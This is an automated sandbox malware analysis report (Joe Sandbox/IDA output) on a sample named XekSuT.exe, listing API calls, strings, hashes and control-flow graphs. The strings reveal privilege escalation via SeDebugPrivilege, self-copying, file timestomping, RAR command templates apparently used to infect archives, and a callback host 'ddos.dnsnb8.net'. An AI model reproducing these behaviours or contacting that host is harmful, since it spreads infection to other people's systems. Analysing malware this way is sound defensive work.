                                                                                                                  • Part of subcall function 003C29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 003C2A9F
                                                                                                                  • Part of subcall function 003C29E2: lstrlen.KERNEL32(Documents and Settings), ref: 003C2AAE
                                                                                                                  • Part of subcall function 003C29E2: memset.MSVCRT ref: 003C2AC6
                                                                                                                  • Part of subcall function 003C29E2: memset.MSVCRT ref: 003C2ADA
                                                                                                                  • Part of subcall function 003C29E2: FindFirstFileA.KERNEL32(?,?), ref: 003C2AEF
                                                                                                                  • Part of subcall function 003C29E2: memset.MSVCRT ref: 003C2B13
                                                                                                                • strrchr.MSVCRT ref: 003C2959
                                                                                                                • lstrcmpiA.KERNEL32(00000001,exe), ref: 003C2974
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                                                                                                • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                                                                                                • API String ID: 3004273771-3007274656
                                                                                                                • Opcode ID: ac7731c78733de249e3117d5fc4aa09da67d9c5b5b88d8a1847f10e983c3cc0a
                                                                                                                • Instruction ID: 268be7f06f6f55d686bd06d44ce1876c6ed750d19c284def6d29b9bdb3f7f90c
                                                                                                                • Opcode Fuzzy Hash: ac7731c78733de249e3117d5fc4aa09da67d9c5b5b88d8a1847f10e983c3cc0a
                                                                                                                • Instruction Fuzzy Hash: B231F47690031C7BDB22ABA4DC89FCB376CAF11310F05485AF585E6080E7B4EED48BA0

Control-flow Graph

APIs
• GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 003C164F
• GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 003C165B
• GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\XekSuT.exe,00000104), ref: 003C166E
• CreateThread.KERNEL32(00000000,00000000,003C1099,00000000,00000000,00000000), ref: 003C16AC
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 003C16BD
  • Part of subcall function 003C139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XekSuT.exe), ref: 003C13BC
  • Part of subcall function 003C139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 003C13DA
  • Part of subcall function 003C139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 003C1448
• lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\XekSuT.exe), ref: 003C16E5
Strings
Memory Dump Source
• Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
Similarity
• API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
• String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XekSuT.exe$C:\Windows\system32$Documents and Settings
• API String ID: 123563730-3137646543
• Opcode ID: f521d40fe576735e0893b3970191a1ebc7bcc436cac9cb39ba913cb7b8a055e6
• Instruction ID: d6c56e060305aa484897a39ba92f621994c25277864edc337473c06e0de59bbe
• Opcode Fuzzy Hash: f521d40fe576735e0893b3970191a1ebc7bcc436cac9cb39ba913cb7b8a055e6
• Instruction Fuzzy Hash: 9011D073500224BBCB236BA0AD4EFEB3E6DEB03361F004018F20AD50A2C6719D50EBA1

Control-flow Graph
(graph of function 3c1000-3c1096, 9 basic blocks; calls in graph: CreateFileA, GetFileSize, CreateFileMappingA, MapViewOfFile, call 3c17d0, UnmapViewOfFile, CloseHandle x2)

APIs
• CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG<,http://%s:%d/%s/%s,003C10E8,?), ref: 003C1018
• GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75BF8400), ref: 003C1029
• CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 003C1038
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 003C104B
• UnmapViewOfFile.KERNEL32(00000000), ref: 003C1075
• CloseHandle.KERNEL32(?), ref: 003C108B
• CloseHandle.KERNEL32(00000000), ref: 003C108E
Strings
Memory Dump Source
• Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
Similarity
• API ID: File$CloseCreateHandleView$MappingSizeUnmap
• String ID: HG<$ddos.dnsnb8.net$http://%s:%d/%s/%s
• API String ID: 1223616889-3593622639
• Opcode ID: b6b3ad7f86a71f7b7c4934247a963e9c3d4b07f1274ac140bc2e82cc9a8d9f46
• Instruction ID: b901b843380179819b99d04d24cf0600fa7b6a028d6af4d23a75f688dd9b0caa
• Opcode Fuzzy Hash: b6b3ad7f86a71f7b7c4934247a963e9c3d4b07f1274ac140bc2e82cc9a8d9f46
• Instruction Fuzzy Hash: E9019BB210036CBFE7316F609C88F2B7BACEB44799F014529F245E2091D6706E449B71

Control-flow Graph
(graph of function 3c2c48-3c2ccc, 7 basic blocks; calls in graph: memset, call 3c1973, CreateThread, WaitForMultipleObjects, VirtualFree)

APIs
• memset.MSVCRT ref: 003C2C57
  • Part of subcall function 003C1973: PathFileExistsA.SHLWAPI(\N<`N<,00000000,C:\Users\user\AppData\Local\Temp\XekSuT.exe), ref: 003C1992
  • Part of subcall function 003C1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003C19BA
  • Part of subcall function 003C1973: Sleep.KERNEL32(00000064), ref: 003C19C6
  • Part of subcall function 003C1973: wsprintfA.USER32 ref: 003C19EC
  • Part of subcall function 003C1973: CopyFileA.KERNEL32(?,?,00000000), ref: 003C1A00
  • Part of subcall function 003C1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C1A1E
  • Part of subcall function 003C1973: GetFileSize.KERNEL32(?,00000000), ref: 003C1A2C
  • Part of subcall function 003C1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 003C1A46
  • Part of subcall function 003C1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 003C1A65
• CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 003C2C99
• WaitForMultipleObjects.KERNEL32(00000001,003C16BA,00000001,000000FF,?,003C16BA,00000000), ref: 003C2CAC
• VirtualFree.KERNEL32(013A0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\XekSuT.exe,003C4E5C,003C4E60,?,003C16BA,00000000), ref: 003C2CC2
Strings
• C:\Users\user\AppData\Local\Temp\XekSuT.exe, xrefs: 003C2C69
Memory Dump Source
• Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
Similarity
• API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
• String ID: C:\Users\user\AppData\Local\Temp\XekSuT.exe
• API String ID: 2042498389-472551747
• Opcode ID: d49a49f8d785bc09b0cbf0b4d2830d282d7de241ae7472f9c8e2b7b9f98605ec
• Instruction ID: 5704da6535dc017d361bed997a7f9d634971eb5aba8d880974a074fce6d7bf37
• Opcode Fuzzy Hash: d49a49f8d785bc09b0cbf0b4d2830d282d7de241ae7472f9c8e2b7b9f98605ec
• Instruction Fuzzy Hash: 9C018F726412247AD712ABA59C5AFEF7E6CEF01B60F118119F905D61C1DAA0AE40C7E0

Control-flow Graph
(graph of function 3c14e1-3c157a, 13 basic blocks; calls in graph: GetModuleHandleA, VirtualQuery, call 3c1af9, call 3c1638, ExitProcess)

APIs
• GetModuleHandleA.KERNEL32(00000000), ref: 003C1504
• VirtualQuery.KERNEL32(003C14E1,?,0000001C), ref: 003C1525
• ExitProcess.KERNEL32 ref: 003C157A
Memory Dump Source
• Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
Similarity
• API ID: ExitHandleModuleProcessQueryVirtual
• String ID:
• API String ID: 3946701194-0
• Opcode ID: ef30796cc0a4834d2dc71aa77b9fc9577f356b194cad039f36d264b2a740cf1c
• Instruction ID: 24414804646e0a779751f4b66de769b9e8cfd7db77386f45ff74ccc13b5cb305
• Opcode Fuzzy Hash: ef30796cc0a4834d2dc71aa77b9fc9577f356b194cad039f36d264b2a740cf1c
• Instruction Fuzzy Hash: 79115172900214DFCB13EF65A898F7977BCEB86711F11402EF403D6262D230AD41BB90

Control-flow Graph
(graph of function 3c1915-3c1970, 10 basic blocks; calls in graph: memset, GetFileTime, SetFileTime)

APIs
Memory Dump Source
• Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
Similarity
• API ID: FileTimememset
• String ID:
• API String ID: 176422537-0
• Opcode ID: 5bc7f1a06c99814d281421db399a5c592e2ab2388903f37030b47968d97ce067
• Instruction ID: 40c867de423dcdbe0f336e64c570ff2c779afa1bf35a8100f885a6a91b89933f
• Opcode Fuzzy Hash: 5bc7f1a06c99814d281421db399a5c592e2ab2388903f37030b47968d97ce067
• Instruction Fuzzy Hash: 8DF04F32200209ABDB629E26DC04FAB77ACAB51761F01853EF516D5491E730EA49ABE0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 406 3c6158-3c615d 407 3c615f-3c6189 VirtualFree 406->407 408 3c618c-3c6192 407->408 409 3c6198-3c61b0 VirtualFree 408->409 410 3c60c7-3c60cf 408->410 411 3c61ba-3c61c8 409->411 412 3c61b2-3c61b4 409->412 410->408 413 3c60d5-3c60f8 VirtualAlloc 410->413 415 3c61ca-3c61d7 411->415 416 3c6243-3c6251 411->416 412->411 431 3c60fe-3c6106 413->431 432 3c60fa-3c60fc call 3c66c8 413->432 420 3c61dd-3c61e0 415->420 418 3c6264-3c626f 416->418 419 3c6253 416->419 423 3c6271-3c6276 418->423 422 3c6255-3c6258 419->422 420->416 424 3c61e2-3c61f2 420->424 422->418 426 3c625a-3c6262 422->426 427 3c627c-3c6289 423->427 428 3c6389-3c63b1 VirtualProtect 423->428 429 3c61f5-3c61fe 424->429 426->422 448 3c628b 427->448 449 3c6292-3c6298 427->449 430 3c63b7-3c63ba 428->430 433 3c620c-3c6219 429->433 434 3c6200-3c6203 429->434 436 3c63fc-3c6416 VirtualProtect 430->436 437 3c63bc-3c63c2 430->437 439 3c6108-3c611d 431->439 440 3c6155 431->440 432->431 435 3c6238-3c623f 433->435 442 3c621b-3c6228 434->442 443 3c6205-3c6208 434->443 435->429 445 3c6241 435->445 453 3c6418-3c641d 436->453 454 3c6420-3c6425 436->454 437->437 444 3c63c4 437->444 446 3c611f-3c6121 439->446 440->407 442->435 450 3c622a-3c6236 443->450 451 3c620a 443->451 444->436 455 3c63c6-3c63cf 444->455 445->420 456 3c6151-3c6154 446->456 457 3c6123 446->457 448->449 452 3c62a2-3c62ac 449->452 450->435 451->435 458 3c62ae 452->458 459 3c62b1-3c62c8 452->459 460 3c63d4-3c63d8 455->460 461 3c63d1 455->461 456->440 457->456 462 3c6125-3c6128 457->462 458->459 463 3c62ce-3c62d4 459->463 464 3c6373-3c6384 459->464 465 3c63dd-3c63e1 460->465 466 3c63da 460->466 461->460 467 3c612a-3c612e 462->467 468 3c6134-3c613b 462->468 469 3c62da-3c62f1 463->469 470 3c62d6-3c62d9 463->470 464->423 471 3c63e7-3c63fa VirtualProtect 465->471 472 3c63e3 465->472 466->465 467->468 476 3c6130-3c6132 467->476 475 
3c613d-3c614f 468->475 468->476 478 3c6365-3c636e 469->478 479 3c62f3-3c62f9 469->479 470->469 471->430 471->436 472->471 475->446 476->446 478->452 480 3c62fb-3c630f 479->480 481 3c6314-3c6326 479->481 482 3c6426-3c64c0 480->482 483 3c634c-3c6360 481->483 484 3c6328-3c634a 481->484 493 3c6535-3c6537 482->493 494 3c64c2 482->494 483->482 484->478 495 3c6539 493->495 496 3c659a 493->496 497 3c64f8 494->497 498 3c64c5-3c64cd 494->498 501 3c653b-3c6541 495->501 502 3c65b4 495->502 503 3c659b-3c659d 496->503 499 3c656c-3c656f 497->499 500 3c64fa-3c64fe 497->500 504 3c64cf-3c64d4 498->504 505 3c6542-3c6545 498->505 509 3c6572 499->509 500->509 510 3c6500 500->510 501->505 508 3c65be-3c6608 502->508 511 3c659f 503->511 512 3c6591-3c6593 503->512 506 3c64d6-3c64d9 504->506 507 3c6517-3c651c 504->507 513 3c654d-3c6550 505->513 506->513 516 3c64db-3c64f5 506->516 520 3c651d-3c651e 507->520 521 3c6583-3c6587 507->521 517 3c6573-3c6576 509->517 518 3c6522-3c6533 510->518 519 3c6502 510->519 514 3c6588-3c658b 511->514 512->503 522 3c6595 512->522 513->508 515 3c6552-3c6556 513->515 526 3c658d-3c658f 514->526 527 3c65a1-3c65a3 514->527 523 3c6578-3c657f 515->523 524 3c6558-3c6569 515->524 516->497 517->523 518->493 519->517 525 3c6504-3c6513 519->525 520->518 521->514 522->496 523->521 524->499 525->493 529 3c6515 525->529 526->512 529->507
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 003C60DF
                                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 003C6189
                                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 003C61A5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$Free$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1852963964-0
                                                                                                                • Opcode ID: 48ba39f76e1a590c558f6182c4e46f6470678108b7c66a1ec93a7b1812be8fd1
                                                                                                                • Instruction ID: 462e4e8892b64bd51e057223b5ad1234bf9ffa50357326fe54c364a209020eed
                                                                                                                • Opcode Fuzzy Hash: 48ba39f76e1a590c558f6182c4e46f6470678108b7c66a1ec93a7b1812be8fd1
                                                                                                                • Instruction Fuzzy Hash: 61215E31604659CFCF328F58CC92BED37A2EF45301F6A481DDE899B291DA716D40CB94
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\XekSuT.exe,?,?,?,?,?,?,003C13EF), ref: 003C11AB
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000028,003C13EF,?,?,?,?,?,?,003C13EF), ref: 003C11BB
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(003C13EF,00000000,?,00000010,00000000,00000000), ref: 003C11EB
                                                                                                                • CloseHandle.KERNEL32(003C13EF), ref: 003C11FA
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,003C13EF), ref: 003C1203
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\XekSuT.exe, xrefs: 003C11A5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                                • API String ID: 75692138-472551747
                                                                                                                • Opcode ID: 64821afccfc2a58261b49766948be89fd5facda2b613e0999f5827eb70016f76
                                                                                                                • Instruction ID: 9d076224f8d0be878fd9a1dcf5b3ccd7fee5d45c06eab28bdb0ce571f78ee1d9
                                                                                                                • Opcode Fuzzy Hash: 64821afccfc2a58261b49766948be89fd5facda2b613e0999f5827eb70016f76
                                                                                                                • Instruction Fuzzy Hash: 9A01E4B6900219EFDB01EFE4CD89EAEBBBCFB04305F108469E606E2251D771AF449B50
                                                                                                                APIs
                                                                                                                • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XekSuT.exe), ref: 003C13BC
                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 003C13DA
                                                                                                                • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 003C1448
                                                                                                                  • Part of subcall function 003C119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\XekSuT.exe,?,?,?,?,?,?,003C13EF), ref: 003C11AB
                                                                                                                  • Part of subcall function 003C119F: OpenProcessToken.ADVAPI32(00000000,00000028,003C13EF,?,?,?,?,?,?,003C13EF), ref: 003C11BB
                                                                                                                  • Part of subcall function 003C119F: AdjustTokenPrivileges.ADVAPI32(003C13EF,00000000,?,00000010,00000000,00000000), ref: 003C11EB
                                                                                                                  • Part of subcall function 003C119F: CloseHandle.KERNEL32(003C13EF), ref: 003C11FA
                                                                                                                  • Part of subcall function 003C119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,003C13EF), ref: 003C1203
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\XekSuT.exe, xrefs: 003C13A8
                                                                                                                • SeDebugPrivilege, xrefs: 003C13D3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\XekSuT.exe$SeDebugPrivilege
                                                                                                                • API String ID: 4123949106-1840906038
                                                                                                                • Opcode ID: 555b2cb1baee76b3f8effd19e7130dc1d91bfff2b79c855c48c94673720e4c84
                                                                                                                • Instruction ID: 91a15fa36829aae6b4061a2bb48806baabcb3d4d4c4cf17d94c64a5aa0a1d9cd
                                                                                                                • Opcode Fuzzy Hash: 555b2cb1baee76b3f8effd19e7130dc1d91bfff2b79c855c48c94673720e4c84
                                                                                                                • Instruction Fuzzy Hash: 9B316175D00209EADF62EBA6CC45FEEBBB8EB46704F21806DE505F6142D7309E45DB60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                                                                                • Instruction ID: 8fd2c50f406498a3e98adc455e2f98ba68ecac42621e76a25debc93089c571a9
                                                                                                                • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                                                                                • Instruction Fuzzy Hash: 2081AF71214B418FC729CF29C891AAABBE2EFD5314F148A2DD0EAC7755DB34E809CB44
                                                                                                                APIs
                                                                                                                • strstr.MSVCRT ref: 003C23CC
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003C2464
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 003C2472
                                                                                                                • CloseHandle.KERNEL32(?,00000000,00000000), ref: 003C24A8
                                                                                                                • memset.MSVCRT ref: 003C24B9
                                                                                                                • strrchr.MSVCRT ref: 003C24C9
                                                                                                                • wsprintfA.USER32 ref: 003C24DE
                                                                                                                • strrchr.MSVCRT ref: 003C24ED
                                                                                                                • memset.MSVCRT ref: 003C24F2
                                                                                                                • memset.MSVCRT ref: 003C2505
                                                                                                                • wsprintfA.USER32 ref: 003C2524
                                                                                                                • Sleep.KERNEL32(000007D0), ref: 003C2535
                                                                                                                • Sleep.KERNEL32(000007D0), ref: 003C255D
                                                                                                                • memset.MSVCRT ref: 003C256E
                                                                                                                • wsprintfA.USER32 ref: 003C2585
                                                                                                                • memset.MSVCRT ref: 003C25A6
                                                                                                                • wsprintfA.USER32 ref: 003C25CA
                                                                                                                • Sleep.KERNEL32(000007D0), ref: 003C25D0
                                                                                                                • Sleep.KERNEL32(000007D0,?,?), ref: 003C25E5
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003C25FC
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 003C2611
                                                                                                                • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 003C2642
                                                                                                                • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 003C265B
                                                                                                                • SetEndOfFile.KERNEL32 ref: 003C266D
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 003C2676
                                                                                                                • RemoveDirectoryA.KERNEL32(?), ref: 003C2681
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                                                                                                • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 2203340711-2169341206
                                                                                                                • Opcode ID: 3b8aceb604e7527aa5752af45c8fe1480ab38d5594d8169adad988536c9ccb64
                                                                                                                • Instruction ID: 8e7a513e4b7698e9fe71a09dd0f4042b40a50bb4d63e4e4aa5cc8511b4c1f4e5
                                                                                                                • Opcode Fuzzy Hash: 3b8aceb604e7527aa5752af45c8fe1480ab38d5594d8169adad988536c9ccb64
                                                                                                                • Instruction Fuzzy Hash: 3481AFB2508344ABD712AF64DC49FABB7ACFB88704F00491EF685D2190D770EE498B66
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 003C2766
                                                                                                                • memset.MSVCRT ref: 003C2774
                                                                                                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 003C2787
                                                                                                                • wsprintfA.USER32 ref: 003C27AB
                                                                                                                  • Part of subcall function 003C185B: GetSystemTimeAsFileTime.KERNEL32(003C1F92,00000000,?,00000000,?,?,?,003C1F92,?,00000000,00000002), ref: 003C1867
                                                                                                                  • Part of subcall function 003C185B: srand.MSVCRT ref: 003C1878
                                                                                                                  • Part of subcall function 003C185B: rand.MSVCRT ref: 003C1880
                                                                                                                  • Part of subcall function 003C185B: srand.MSVCRT ref: 003C1890
                                                                                                                  • Part of subcall function 003C185B: rand.MSVCRT ref: 003C1894
                                                                                                                • wsprintfA.USER32 ref: 003C27C6
                                                                                                                • CopyFileA.KERNEL32(?,003C4C80,00000000), ref: 003C27D4
                                                                                                                • wsprintfA.USER32 ref: 003C27F4
                                                                                                                  • Part of subcall function 003C1973: PathFileExistsA.SHLWAPI(\N<`N<,00000000,C:\Users\user\AppData\Local\Temp\XekSuT.exe), ref: 003C1992
                                                                                                                  • Part of subcall function 003C1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003C19BA
                                                                                                                  • Part of subcall function 003C1973: Sleep.KERNEL32(00000064), ref: 003C19C6
                                                                                                                  • Part of subcall function 003C1973: wsprintfA.USER32 ref: 003C19EC
                                                                                                                  • Part of subcall function 003C1973: CopyFileA.KERNEL32(?,?,00000000), ref: 003C1A00
                                                                                                                  • Part of subcall function 003C1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C1A1E
